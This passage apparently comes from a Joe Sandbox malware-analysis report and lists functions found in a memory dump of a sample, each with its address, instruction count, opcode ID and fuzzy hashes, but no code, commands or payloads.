                                                      • Source File: 00000010.00000002.4137137785.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_3030000_ZOlmYtPdlO.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1b32ca50e45d8785873a63438701d0acc7e67aabe4393fcc137d8d3f3de0250b
                                                      • Instruction ID: 86877baa26da81d239b6c7b75ba6010f01d65cf98141c69cf010e757a57f435f
                                                      • Opcode Fuzzy Hash: 1b32ca50e45d8785873a63438701d0acc7e67aabe4393fcc137d8d3f3de0250b
                                                      • Instruction Fuzzy Hash: 30F096353216104FCB15DA2E9854B2AB6EEEFCAA5535D807AE949C7361EE25CC038790
                                                      Function 0303E8E8 Relevance: .0, Instructions: 43COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.4137137785.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_3030000_ZOlmYtPdlO.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8e949e7b46c3ecbdd605767c1a28302c0887621eaf736cd54d79011c5f876b24
                                                      • Instruction ID: d258a2a3ae0742e92779c728963927bcddfa6c8bf0d496930008a622be532c73
                                                      • Opcode Fuzzy Hash: 8e949e7b46c3ecbdd605767c1a28302c0887621eaf736cd54d79011c5f876b24
                                                      • Instruction Fuzzy Hash: 45012574D0020AEFCB01CFA8E844AEEBBB1FB89300F508079E915A3350D7389A52CF91
                                                      Function 030328AA Relevance: .0, Instructions: 21COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.4137137785.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_3030000_ZOlmYtPdlO.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b2af7cfc720a8bda18527b89816c77183cd9919dd6c82bff9f69b3c0518ae381
                                                      • Instruction ID: 35e726587b971ad9de97ac0f04bba7d48397584dc06cc42e04bd451f267646a1
                                                      • Opcode Fuzzy Hash: b2af7cfc720a8bda18527b89816c77183cd9919dd6c82bff9f69b3c0518ae381
                                                      • Instruction Fuzzy Hash: 5AE0C232D2022A57CB00EAA1DC404EFB738EEC1620B904222D85433100EF30765A82B2
                                                      Function 030328B0 Relevance: .0, Instructions: 19COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.4137137785.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_3030000_ZOlmYtPdlO.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: cba3d3201f2ca49dcb605e4234156fdf4f1d47bab7e73d5ad1906c11a1c60269
                                                      • Instruction ID: 38500f3bade9f6392afe9a83f925e0f025d31839c3fe1b8d4446b912d8b1d3f2
                                                      • Opcode Fuzzy Hash: cba3d3201f2ca49dcb605e4234156fdf4f1d47bab7e73d5ad1906c11a1c60269
                                                      • Instruction Fuzzy Hash: 72D01231D2022A578B00AAA5DC044EEB738EE95665B504626D55437140EB70665986A2
                                                      Function 03036739 Relevance: .0, Instructions: 18COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.4137137785.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_3030000_ZOlmYtPdlO.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 969e42339ee87252929d5f7e56949aeb9499e5cfc347bd898d7623ced2754734
                                                      • Instruction ID: 9888fafebf1f760dd0c2a3c96070c223a535e8290faf02c4762380f1c2ba347a
                                                      • Opcode Fuzzy Hash: 969e42339ee87252929d5f7e56949aeb9499e5cfc347bd898d7623ced2754734
                                                      • Instruction Fuzzy Hash: 0BD05E320643054EC741F774ED8B7E6BB2AEB80220F544531E0060AE5EEF7C988856E9
                                                      Function 0303D6D4 Relevance: .0, Instructions: 16COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.4137137785.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_3030000_ZOlmYtPdlO.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 768615d35794675f10766f1d1b63729281f502d89073acf8e370d755225eab88
                                                      • Instruction ID: 814edcaf5ec6434a87dc6574779d164a06c04e0c4302831db3e0a23f94f57637
                                                      • Opcode Fuzzy Hash: 768615d35794675f10766f1d1b63729281f502d89073acf8e370d755225eab88
                                                      • Instruction Fuzzy Hash: 84D04235E5410DCBCB20EFB8E5854DCBB75EB99321B10542BE925A3251DA305455CF11
                                                      Function 0303AFAD Relevance: .0, Instructions: 16COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.4137137785.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_3030000_ZOlmYtPdlO.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7987d69de418b5ffee80271881e5b806914000af21653099ddc2c80efc9d82f7
                                                      • Instruction ID: 69ec452f754fb46ba37ff1ec22219a9895ad591e3e18aace5873ef75afb651e8
                                                      • Opcode Fuzzy Hash: 7987d69de418b5ffee80271881e5b806914000af21653099ddc2c80efc9d82f7
                                                      • Instruction Fuzzy Hash: 78D0673AB40058DFCB049F99E8409DDFBB6FB98221B148117F915A3261CA319925DB94
                                                      Function 03036748 Relevance: .0, Instructions: 12COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.4137137785.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_3030000_ZOlmYtPdlO.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e58b121529fc49b02013e8ec035316d37ba14779914347578b2c5e9388b74a88
                                                      • Instruction ID: 23000b377c8e2e9f234a32cf871af9a285a1603bdb0e288fe6935a83708619f3
                                                      • Opcode Fuzzy Hash: e58b121529fc49b02013e8ec035316d37ba14779914347578b2c5e9388b74a88
                                                      • Instruction Fuzzy Hash: 8BC012300543098EC601FB65ED46555772FEAD0200B409A30E00606A5DDF7D5D895694

                                                      Non-executed Functions

                                                      Function 03036920 Relevance: 5.0, Strings: 4, Instructions: 49COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.4137137785.0000000003030000.00000040.00000800.00020000.00000000.sdmp, Offset: 03030000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_3030000_ZOlmYtPdlO.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: \;^q$\;^q$\;^q$\;^q
                                                      • API String ID: 0-3001612457
                                                      • Opcode ID: b0357ea86c5aa274627adb38aea73f960ab2d01c838fdb7b14f2c9fa5652dff0
                                                      • Instruction ID: 1a90f30c2c020f0dea9abe511dcd214c3e4b5768bacccd4f0d2e7a8f9e7a5ff2
                                                      • Opcode Fuzzy Hash: b0357ea86c5aa274627adb38aea73f960ab2d01c838fdb7b14f2c9fa5652dff0
                                                      • Instruction Fuzzy Hash: 7901B531741108AFCB94CE2DC584929B7EFAF8AB60719446BD446CF3B4DA32DC418740